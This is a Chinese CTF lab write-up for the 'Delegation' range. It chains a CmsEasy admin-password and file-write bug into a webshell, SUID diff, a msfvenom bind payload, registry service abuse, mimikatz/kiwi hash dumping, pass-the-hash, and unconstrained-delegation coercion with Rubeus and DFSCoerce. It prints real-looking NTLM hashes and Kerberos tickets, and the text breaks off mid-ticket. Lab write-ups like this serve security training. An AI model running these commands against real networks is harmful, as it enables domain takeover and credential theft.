lvzhouhang

春秋云镜-Delegation

  • ~22.35K 字
  1. 1. FLAG1
  2. 2. FLAG2
  3. 3. FLAG3&FLAG4

FLAG1

首先对靶机进行信息搜集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
┌──(root㉿kali)-[~/Desktop/tmp]
└─# ../pentest/fscan/fscan2 -h 39.99.130.13
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-17 22:29:55] [INFO] 暴力破解线程数: 1
[2025-04-17 22:29:55] [INFO] 开始信息扫描
[2025-04-17 22:29:55] [INFO] 最终有效主机数量: 1
[2025-04-17 22:29:55] [INFO] 开始主机扫描
[2025-04-17 22:29:55] [INFO] 有效端口数量: 233
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:22
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:21
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:3306
[2025-04-17 22:29:56] [SUCCESS] 端口开放 39.99.130.13:80
[2025-04-17 22:29:56] [SUCCESS] 服务识别 39.99.130.13:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux  信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-17 22:29:56] [SUCCESS] 服务识别 39.99.130.13:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-17 22:30:01] [SUCCESS] 服务识别 39.99.130.13:3306 => [mysql] 版本:8.0.29-0ubuntu0.20.04.3 产品:MySQL
[2025-04-17 22:30:01] [SUCCESS] 服务识别 39.99.130.13:80 => [http]
[2025-04-17 22:30:04] [INFO] 存活端口数量: 4
[2025-04-17 22:30:04] [INFO] 开始漏洞扫描
[2025-04-17 22:30:04] [INFO] 加载的插件: ftp, mysql, ssh, webpoc, webtitle
[2025-04-17 22:30:05] [SUCCESS] 网站标题 http://39.99.130.13       状态码:200 长度:68104  标题:中文网页标题

80端口是cmseasy,url后面拼接/admin版本号是v7752,在网上可以查到漏洞

https://jdr2021.github.io/2021/10/14/CmsEasy_7.7.5_20211012%E5%AD%98%E5%9C%A8%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E5%86%99%E5%85%A5%E5%92%8C%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E/

都需要登录后台,弱口令admin:123456登录成功了

发包然后去访问1.php可以发现写入成功了,写个一句话木马,然后蚁剑连接

flag在/home/flag/下,但是只有root能查看,反弹一个shell准备提权

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@localhost:/var/www/html$ find / -perm -u=s 2>/dev/null
find / -perm -u=s 2>/dev/null

/usr/bin/stapbpf
/usr/bin/gpasswd
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/staprun
/usr/bin/at
/usr/bin/diff
/usr/bin/fusermount
/usr/bin/sudo
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/passwd
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

可以看到diff具有suid权限,可以读取flag01.txt

FLAG2

还给了一个hint

1
2
3
Great job!!!!!!
Here is the hint: WIN19\Adrian
I'll do whatever I can to rock you...

上传一个fscan先扫,然后做一个代理隧道

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
www-data@localhost:/tmp$ ./fscan -h 172.22.4.36/24
./fscan -h 172.22.4.36/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-18 11:04:32] [INFO] 暴力破解线程数: 1
[2025-04-18 11:04:32] [INFO] 开始信息扫描
[2025-04-18 11:04:32] [INFO] CIDR范围: 172.22.4.0-172.22.4.255
[2025-04-18 11:04:32] [INFO] 生成IP范围: 172.22.4.0.%!d(string=172.22.4.255) - %!s(MISSING).%!d(MISSING)
[2025-04-18 11:04:32] [INFO] 解析CIDR 172.22.4.36/24 -> IP范围 172.22.4.0-172.22.4.255
[2025-04-18 11:04:33] [INFO] 最终有效主机数量: 256
[2025-04-18 11:04:33] [INFO] 开始主机扫描
[2025-04-18 11:04:33] [INFO] 正在尝试无监听ICMP探测...
[2025-04-18 11:04:33] [INFO] 当前用户权限不足,无法发送ICMP包
[2025-04-18 11:04:33] [INFO] 切换为PING方式探测...
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.7      存活 (ICMP)
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.36     存活 (ICMP)
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.45     存活 (ICMP)
[2025-04-18 11:04:33] [SUCCESS] 目标 172.22.4.19     存活 (ICMP)
[2025-04-18 11:04:39] [INFO] 存活主机数量: 4
[2025-04-18 11:04:39] [INFO] 有效端口数量: 233
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:80
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:80
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:135
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:139
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.19:135
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:139
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:135
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.19:139
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:389
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:445
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:22
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:21
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.19:445
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.45:445
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.7:88
[2025-04-18 11:04:39] [SUCCESS] 端口开放 172.22.4.36:3306
[2025-04-18 11:04:39] [SUCCESS] 服务识别 172.22.4.36:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-04-18 11:04:40] [SUCCESS] 服务识别 172.22.4.36:21 => [ftp] 版本:3.0.3 产品:vsftpd 系统:Unix Banner:[220 (vsFTPd 3.0.3).]
[2025-04-18 11:04:40] [SUCCESS] 服务识别 172.22.4.36:3306 => [mysql] 版本:8.0.29-0ubuntu0.20.04.3 产品:MySQL Banner:[[.8.0.29-0ubuntu0.20.04.3 @.uoo ^_Z.Q.8Db#X \>; caching_sha2_password]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.45:80 => [http]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.45:139 =>  Banner:[.]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.7:139 =>  Banner:[.]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.19:139 =>  Banner:[.]
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.7:389 => [ldap] 产品:Microsoft Windows Active Directory LDAP 系统:Windows 信息:Domain: xiaorang.lab, Site: Default-First-Site-Name
[2025-04-18 11:04:44] [SUCCESS] 服务识别 172.22.4.7:445 => 
[2025-04-18 11:04:45] [SUCCESS] 服务识别 172.22.4.19:445 => 
[2025-04-18 11:04:45] [SUCCESS] 服务识别 172.22.4.45:445 => 
[2025-04-18 11:04:45] [SUCCESS] 服务识别 172.22.4.7:88 => 
[2025-04-18 11:04:48] [SUCCESS] 服务识别 172.22.4.36:80 => [http]
[2025-04-18 11:05:44] [SUCCESS] 服务识别 172.22.4.7:135 => 
[2025-04-18 11:05:44] [SUCCESS] 服务识别 172.22.4.19:135 => 
[2025-04-18 11:05:44] [SUCCESS] 服务识别 172.22.4.45:135 => 
[2025-04-18 11:05:44] [INFO] 存活端口数量: 16
[2025-04-18 11:05:44] [INFO] 开始漏洞扫描
[2025-04-18 11:05:44] [INFO] 加载的插件: findnet, ftp, ldap, ms17010, mysql, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-18 11:05:44] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.4.45
主机名: WIN19
发现的网络接口:
   IPv4地址:
      └─ 172.22.4.45
[2025-04-18 11:05:45] [SUCCESS] NetBios 172.22.4.45     XIAORANG\WIN19                
[2025-04-18 11:05:45] [SUCCESS] 网站标题 http://172.22.4.45        状态码:200 长度:703    标题:IIS Windows Server
[2025-04-18 11:05:45] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.4.7
主机名: DC01
发现的网络接口:
   IPv4地址:
      └─ 172.22.4.7
[2025-04-18 11:05:45] [SUCCESS] NetInfo 扫描结果
目标主机: 172.22.4.19
主机名: FILESERVER
发现的网络接口:
   IPv4地址:
      └─ 172.22.4.19
[2025-04-18 11:05:45] [SUCCESS] NetBios 172.22.4.7      DC:DC01.xiaorang.lab             Windows Server 2016 Datacenter 14393
[2025-04-18 11:05:45] [SUCCESS] NetBios 172.22.4.19     FILESERVER.xiaorang.lab             Windows Server 2016 Standard 14393
[2025-04-18 11:05:45] [INFO] 系统信息 172.22.4.7 [Windows Server 2016 Datacenter 14393]
[2025-04-18 11:05:45] [SUCCESS] 网站标题 http://172.22.4.36        状态码:200 长度:68100  标题:中文网页标题

上面的flag1给了个提示在WIN19那台机器上存在一个Adrian用户,密码在rockyou里

1
SMB         172.22.4.45     445    WIN19            [-] WIN19\Adrian:babygirl1 STATUS_PASSWORD_EXPIRED

还是得眼尖一点,密码过期他不会告诉你,rdp登录修改密码

1
rdesktop 172.22.4.45

桌面上有一个PrivescCheck文件夹,PrivescCheck是一个提权的工具,他跑完了留下一个html文件,直接访问就行

给了两个high,第一个WSUS 更多的是被利用来横向移动,第二个注册表,用户对gpupdate具有写、启动、停止的的权限

用msf生成一个正向的木马

1
2
3
4
5
6
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=9999 -f exe -o bind.exe
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set LPORT 9999
set RHOST 172.22.4.45
run

将马上传上去然后修改一下注册表手动启动服务

1
sc start gupdate

但是这个shell很快就会断开,所以要迁移到另一个进程中

1
2
ps
migrate PID

不知道为什么我的msf shell启动不起来,导出hash

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
load kiwi
creds_all
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============

Username  Domain    NTLM                              SHA1
--------  ------    ----                              ----
Adrian    WIN19     4ba5d16eb261eb61148ab5264f457cbb  9a712bd84b09123d36da74d9d5ac255c027588eb
WIN19$    XIAORANG  d41fef724adf6f2ed2cbb5a4ebd186c9  af156e5c6afc93b1a648040bd59f7d5cab23d81a
WIN19$    XIAORANG  5943c35371c96f19bda7b8e67d041727  5a4dc280e89974fdec8cf1b2b76399d26f39b8f8

wdigest credentials
===================

Username  Domain    Password
--------  ------    --------
(null)    (null)    (null)
Adrian    WIN19     (null)
WIN19$    XIAORANG  (null)

kerberos credentials
====================

Username  Domain        Password
--------  ------        --------
(null)    (null)        (null)
Adrian    WIN19         (null)
WIN19$    xiaorang.lab  ab 04 9b b9 d9 60 00 27 6b a0 0c 12 eb 66 73 a5 28 ef 5c 0e c3 89 fa c2 4b f8 67 35 a9 25
                         75 bd c0 62 20 be d1 58 31 0b d1 5b 0e 15 41 4f c6 c6 4f 10 43 c8 cf a4 66 b8 0b 5c e8 4
                        5 dd 12 e9 f9 8b 47 4c e1 6d cb 52 e1 5f 97 c3 73 1b 79 89 ca 8d 4c bf 42 47 4b 69 91 16
                        9e 01 e2 78 36 07 fe 11 3b 1f f0 0a 12 6a d7 d8 b1 71 de 2e bd 75 84 c7 00 fa 3b 7c 7f 9a
                         75 85 e8 93 23 ae 41 64 34 7d da 85 3a 5e 61 72 a4 5d 39 57 4b 1e ab 81 a7 02 ef ac 6c 6
                        1 af 28 2a ee ab 34 ce 1e 00 d3 f7 89 d7 fd 40 29 ce 0c e2 c3 d1 fa d8 9f df d2 3d 7e 9d
                        d8 05 77 70 60 3c 7d a6 d3 83 a7 e2 bf b0 a2 c7 57 97 d0 d3 ab c0 ee cb e2 b7 3d e7 a6 5d
                         fd de 51 0c f2 69 d1 58 af ee 8d d1 c0 a3 14 ab 09 c8 9d db 37 e6 8e 62 b2 71 61 d6 2d 5
                        c 57 a8
WIN19$    xiaorang.lab  3a 94 de 4d 87 8e 7d 46 88 ec 9c 70 fd f0 c5 3e 4c f3 ce 6a 80 79 46 c6 2f f9 52 9b 4e 1d
                         90 58 52 2a 4e ac bf 05 09 08 06 0c 4b a9 a2 aa a2 9d db 0d f8 09 82 c0 6e f4 1b 81 93 5
                        9 67 54 de 17 82 d7 c3 82 c5 38 13 4f d0 55 98 f6 a2 cc e7 cb 85 84 35 8a 0c 2e 9f d1 90
                        0c 0f c1 ea 0d d9 c5 d9 7f 29 a3 57 46 6b bf a4 b9 73 9a 80 84 1d df 3f 33 f5 16 e4 ee 2e
                         d3 88 92 cd a5 6e ac e3 eb 71 43 ed 7c b8 a2 9e 52 d5 31 1c 50 9b c8 71 03 e1 8e 4f 60 5
                        3 84 13 19 02 e2 8d 92 3f dc 0b 38 2c 13 c1 0e 6b 64 a7 fc 7a 2a a5 0e e0 b0 66 a9 a0 2f
                        8d 8d 40 f8 72 d3 36 d3 3a a9 0d 3f b9 00 ef 3e 90 d9 36 a2 ad 36 2a 22 cd a0 cc 5b f4 0e
                         a4 6b d3 24 8e 6e 99 59 96 d9 f8 a7 26 09 58 0a c2 3a 69 56 76 40 b9 10 92 a7 5c aa 3d e
                        1 d0 1f
win19$    XIAORANG.LAB  ab 04 9b b9 d9 60 00 27 6b a0 0c 12 eb 66 73 a5 28 ef 5c 0e c3 89 fa c2 4b f8 67 35 a9 25
                         75 bd c0 62 20 be d1 58 31 0b d1 5b 0e 15 41 4f c6 c6 4f 10 43 c8 cf a4 66 b8 0b 5c e8 4
                        5 dd 12 e9 f9 8b 47 4c e1 6d cb 52 e1 5f 97 c3 73 1b 79 89 ca 8d 4c bf 42 47 4b 69 91 16
                        9e 01 e2 78 36 07 fe 11 3b 1f f0 0a 12 6a d7 d8 b1 71 de 2e bd 75 84 c7 00 fa 3b 7c 7f 9a
                         75 85 e8 93 23 ae 41 64 34 7d da 85 3a 5e 61 72 a4 5d 39 57 4b 1e ab 81 a7 02 ef ac 6c 6
                        1 af 28 2a ee ab 34 ce 1e 00 d3 f7 89 d7 fd 40 29 ce 0c e2 c3 d1 fa d8 9f df d2 3d 7e 9d
                        d8 05 77 70 60 3c 7d a6 d3 83 a7 e2 bf b0 a2 c7 57 97 d0 d3 ab c0 ee cb e2 b7 3d e7 a6 5d
                         fd de 51 0c f2 69 d1 58 af ee 8d d1 c0 a3 14 ab 09 c8 9d db 37 e6 8e 62 b2 71 61 d6 2d 5
                        c 57 a8


hashdump

1
2
3
4
5
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:::
Adrian:1003:aad3b435b51404eeaad3b435b51404ee:4ba5d16eb261eb61148ab5264f457cbb:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:44d8d68ed7968b02da0ebddafd2dd43e:::

用Administrator登录

1
2
3
┌──(root㉿kali)-[~/Desktop/tmp]
└─# impacket-wmiexec  -hashes aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab Administrator@172.22.4.45
C:\>type C:\Users\Administrator\flag\flag02.txt

FLAG3&FLAG4

添加一个新用户

1
2
net user lv Asd123132 /add
net localgroup administrators lv /add

查看域内委派关系

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
C:\Users\lv\Desktop>Adinfo_win.exe -d="xiaorang.lab" --dc="172.22.4.7" -u="WIN19$" -H="d41fef724adf6f2ed2cbb5a4ebd186c9"

           _____  _        __
     /\   |  __ \(_)      / _|
    /  \  | |  | |_ _ __ | |_ ___
   / /\ \ | |  | | | '_ \|  _/ _ \     Tools that collect information from domain
  / ____ \| |__| | | | | | || (_) |
 /_/    \_\_____/|_|_| |_|_| \___/     v1.5 by lzz

[i] Try to connect '172.22.4.7'
[c] Auth Domain: xiaorang.lab
[c] Auth user: WIN19$
[c] Auth hash: d41fef724adf6f2ed2cbb5a4ebd186c9
[c] connected successfully,try to dump domain info
[i] DomainVersion found!
                    [+] Windows 2016 Server operating system
[i] Domain SID:
                    [+] S-1-5-21-1913786442-1328635469-1954894845
[i] Domain MAQ found
                    [+] 10
[i] Domain Account Policy found
                    [+] pwdHistory: 24
                    [+] minPwdLength: 7
                    [+] minPwdAge: 1(day)
                    [+] maxPwdAge: 42(day)
                    [+] lockoutThreshold: 0
                    [+] lockoutDuration: 30(min)
[i] Domain Controllers: 1 found
                    [+] DC01$  ==>>>   Windows Server 2016 Datacenter  [10.0 (14393)]  ==>>>  172.22.4.7
[i] ADCS has not found!
[i] Domain Exchange Server: 0 found
[i] Domain All DNS:
                    [+] Domain Dns 3 found,Saved in All_DNS.csv
[i] Domain Trusts: 0 found
[i] SPN: 39 found
[i] Domain GPOs: 2 found
[i] Domain Admins: 1 users found
                    [+]Administrator
[i] Enterprise Admins: 1 users found
                    [+]Administrator
[i] administrators: 1 users found
                    [+]Administrator
[i] Backup Operators: 0 users found
[i] Users: 6 found
[i] User with Mail: 0 found
[i] Only_name_and_Useful_Users: 3 found
[i] Only_admincount=1_andUseful_Users: 1 found
[i] Locked Users: 0 found
[i] Disabled Users: 3 found
[i] Users with passwords not set to expire: 2 found
[i] Domain Computers: 5 found
[i] Only_name_and_Useful_computers: 5 found
[i] Groups: 49 found
[i] Domain OUs: 1 found
[i] LAPS Not found
[i] LAPS passwords: 0 found
[i] SensitiveDelegate Users: 0 found
[i] AsReproast Users: 0 found
[i] Kerberoast Users: 1 found
                    [+] CN=krbtgt,CN=Users,DC=xiaorang,DC=lab  ==>>>  kadmin/changepw
[i] SIDHistory Users: 0 found
[i] CreatorSID Users: 2 found
                    [+] WIN-3X7U15C2XDM$  ==>>>  Marcus
                    [+] WIN-YUUAW2QG9MF$  ==>>>  Marcus
[i] RBCD Users: 0 found
[i] Unconstrained Deligation Users: 1 found
                    [+] WIN19$
[i] Constrained Deligation Users: 0 found
[i] Krbtgt password last set time: 2022-06-22 22:54:34 +0800 CST
[i] CSVs written to 'csv' directory in C:\Users\lv\Desktop
[i] Execution took 1.0246743s
1
2
[i] Unconstrained Deligation Users: 1 found
                    [+] WIN19$

WIN19$有非约束委派,上传Rubeus进行监听

1
Rubeus.exe monitor /interval:1 /filteruser:DC01$
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
C:\Users\lv\Desktop>Rubeus.exe monitor /interval:1 /filteruser:DC01$

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: TGT Monitoring
[*] Target user     : DC01$
[*] Monitoring every 1 seconds for new TGTs


然后使用dfscoerce让DS向WIN19$认证

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root㉿kali)-[~/Desktop/tmp]
└─# proxy -f proxychains4.conf -q python3 ../script/AD/dfscoerce.py -u "WIN19$" -hashes :d41fef724adf6f2ed2cbb5a4ebd186c9 -d xiaorang.lab WIN19 172.22.4.7
[-] Connecting to ncacn_np:172.22.4.7[\PIPE\netdfs]
[+] Successfully bound!
[-] Sending NetrDfsRemoveStdRoot!
NetrDfsRemoveStdRoot
ServerName:                      'WIN19\x00'
RootShare:                       'test\x00'
ApiFlags:                        1


DFSNM SessionError: code: 0x490 - ERROR_NOT_FOUND - Element not found.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
C:\Users\lvv\Desktop>Rubeus.exe monitor /interval:1 /filteruser:DC01$

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.0

[*] Action: TGT Monitoring
[*] Target user     : DC01$
[*] Monitoring every 1 seconds for new TGTs


[*] 2025/4/18 4:54:32 UTC - Found new TGT:

  User                  :  DC01$@XIAORANG.LAB
  StartTime             :  2025/4/18 10:28:04
  EndTime               :  2025/4/18 20:28:04
  RenewTill             :  2025/4/25 10:28:04
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

    doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRn
    dBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6F05kURrtAGLPwnEu0x0RxvAPS3m5aRx/bjVuGQLR7b0+L
    x5X557jubFee2VfyECSf1RICTWkdJttbkCj4s6IMQrVpe8jFgy3Uki4NC0WdUfzH1nIiJSCq0lRPzgI88NGOrQEbDaurBzq150lY
    i68ssuARb6DWCu6HYLjq66NSI53LNGAHqlNVoU+83ZOhJboPDjY2XL74OXFh0Qr57fWAbUOWegzVPHFicFshmeiMv111lfJr0X6Q
    aqATuWtvoSsDI+/v3HyGMlqmlqJmmt0coW9z0L6V52yL7XA2YfXod7N+hWb/gclV5+C1G7GNj/uM3Zi5DyJ9kk+IuWHKWRRrz7JR
    iPDy9zMJWBDgeMsEEmB/uh492tq+i3g8o49PocQ2TqcnRBPCiAEbpWhpz/LDb6P6f+ySqupcTcM5q9G+6CT6Rj/aMDAjqZEsRpfb
    agn3XEjKWbF+kpAuuvr+eGd0xICbySdM21JRTjqZmZmUPkEe5Y0zKH+wVUUVJOAv8BVeKirxdKtYyDYiudFtUUGGkIzt2Z3J1yJY
    GA8B90UklsraI8O6Q83i2nE11WkcxEXceYh7PBoeL6ivncb8UqZK2Nh07+1QlILNCx+5WFFLjNSoBLhofg3TIsPCr2zFNXTNbBPv
    zP+bjqJawf7BY0KUWNLvgAltKMXX1T9pzNREspsKwRMjXZgsyTbil3reoEciEexNtXVhWxrk+xbp9DIL/74f4rafpIMsi7myoH6a
    u1kjVexmmP4wOWp7KGvMm1gNp+XeakyHPiFlqIt4V0b4KGfd9Zd3rtQI3gtM7oeUm6PDlEn9vK0MVBpZZJeW6IDkZdXC7SBmPM1z
    p0uno3wGRj0MuqqnPaV8XRJR0sEaNGD8HABfQkdCMHm5GQ8w71AIEy9i2otNPegf6P0j4EPsNwtyo2o97GKu/y27tvKv1FH43S4G
    ij5gjiKBxIn2JtQ9oPvb0v+2SZWU08xE6v+b79PsWvr5STsl4eUJHnTuXizQfsY597gQAVgKD7vKeIXEsgb11VVP9HCtUjxCmBNS
    25QzZvXbuWkEJ6k/7AYu0qvT3auHC1cbf4MmuMrc/DlT4MphkuUF5j8hfSEgEAVWhVZVuPZA3v6C+O8PYmDl1d9lT6JjZ5wuQrAG
    Dwt7+cZ9wzuWLDUkB1dtiTm0cuFLXAmOLLDjpSWxIXK2B9TNAagAq2slNrb775ovLLdo/swtuRAKazjqgCAygra59RWoqP+loVv8
    nxii1cB/M4tFLpGuZlTdOnyME8JT8D40++QW5IxMPffywi5tpjhDUnVC1wtK49BOaljvJKH8LcWHWyALrv2j8De6HPabKhCcnDiY
    /w7QHVbcAh/Jo64uH2aYRSQEz5j7oGpAAP3ENCvzEaV8e/53wwRqjyife177PX7j9/ZfoqzfiRnr1kjeHIZsGw5zYyTmLbB/91Np
    RN2jgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCClV6tyB9NAYvRnxe9wuyHOhysxVh63TouQkdqL
    8MLxbKEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDQxODAyMjgwNFqmERgPMjAy
    NTA0MTgxMjI4MDRapxEYDzIwMjUwNDI1MDIyODA0WqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDFhJQU9S
    QU5HLkxBQg==

[*] Ticket cache size: 1

导入 TGT 然后 DCSync

1
Rubeus.exe ptt /ticket:doIFlDCCBZCgAwIBBaEDAgEWooIEnDCCBJhhggSUMIIEkKADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMWElBT1JBTkcuTEFCo4IEVDCCBFCgAwIBEqEDAgECooIEQgSCBD6rh73GDFsxBznVrGsdmcNb9fO1z8fVnV/kQUwXHY0vvUHSorZebamFLkiZi+LEkih3n4TJMOlCI8vlnlS5lPlr03uPc5nd6Pw7PWoVw7m2UH/TmMy4nuBKVVbKEIImNbFyhTleg75qJ+5D224ws/fpRGtQyH0WPmyMbevlI+xTTOLJGe9+YScZMva/hvc2nPq09ZNNzIMo8erEYpJCv1VucuzcoUrJFGTtASWqa0Aaeza+mypwP7OGmc2qnQEMu8l1XIEqe7JYdY934vsm37k8KarPLFlzyOhbzDW4t/GjlZ1aHXSLj332T90BxfZKoSe7tnA8cldicFQ8LmGBWBKeKms6sc8K4KQVGMdhyjno5L5jeKqtL49oc+a44kyJYlGjXnKpep5seUp3+2TXXvmF9/HnHSG+M6QQpepWGdfk6diRhgDvZyq1AX6GggRsXfIEpE721UcTowO2HQOfsv+W++pTiAoEvrkU6ciJ3VI3EZFelGkq3hfZ3MQydIdBCPVeaDwE1fcp05wGuDmuFDhf+C1nelwaTqYJIZScVgR+7o4FcGpStyycsbBMfzdasL70KSV3se6ZlvY24/Binnb3YOHMpWkpLRjUovQ7ep2fCN0f6Pt/P8JTCVC0oCFIy05otlw3n8nd4NctrNBWQBevIiuAobMrJ1Ww5UbSQHrCF6hTV6NTbL1irI3wR10rwNkaxWpspvcL5/HOTzXXRtq619o0lTdpz60KSroci5nuj4WfPtQ6ESiU8c4P9Y/exWUmhOGN10Wg1t4j4k+agTrvK2dy2ybLn1FNkqWMfMr3vcUm8BU7ESstKZp47FG1pkaQl6/bjGwElN0BhycbT8L1yxIj+rFspX3d6olXwiMIaF50EV5DM1V3oH/OJu5sHbIFqrGkRqooDTfrHyF8c1AnruzDtD2lxipt043llvOURkRj8Qd/qIiRZBqnYo4RD95J9J8Jbim35hFzbuV5PMS5Ekw9oRfzsGCD5VeKBb9i02mJTvWUqJjZi/YWI9wKaeKKCTKHYKKSmDfkJlF4gLUp12XwuTe4zEwhXUgBYEC7N7EA6u0/9dxwL5AWaRtOqL05rgFu2Ix2+wfBu1n4ToxGmYke44n6JSSXCqKW2KPkznAU0QPvhcYwjZsOFo4R/bVe9qQAcHBLwQ+9fq8DZBnRStKlgmIMeJXCPAPv5da69p2BnR4Bq+X71X5pWB4C0xHZtmxZ71ahe+cZYmDaap8SEvI7BDTkKaDDnvp3cLSVvX5k5uGrjq06yKqpYjlcfai1Yy8GXlecqf2xQ8b6RjkdPkHKVLQZdGZdZMc77Bj5IXwlGvwSQK5PMxo4z1zceza8WQ7WM/iIVwwDAEklXK9bW3pjfHCX9sB5YxAUA/BbJMxuSc1Q2yMpc8CrRNoNNPY184wjlPMAE0wLtAkkiJJlmhkupOA7ZpdlAwvYPEujgeMwgeCgAwIBAKKB2ASB1X2B0jCBz6CBzDCByTCBxqArMCmgAwIBEqEiBCCkn5s0Ub8lLXnRynzBbuyWO7uYW7F68Wp1NYL+h5IWoqEOGwxYSUFPUkFORy5MQUKiEjAQoAMCAQGhCTAHGwVEQzAxJKMHAwUAYKEAAKURGA8yMDI1MDIx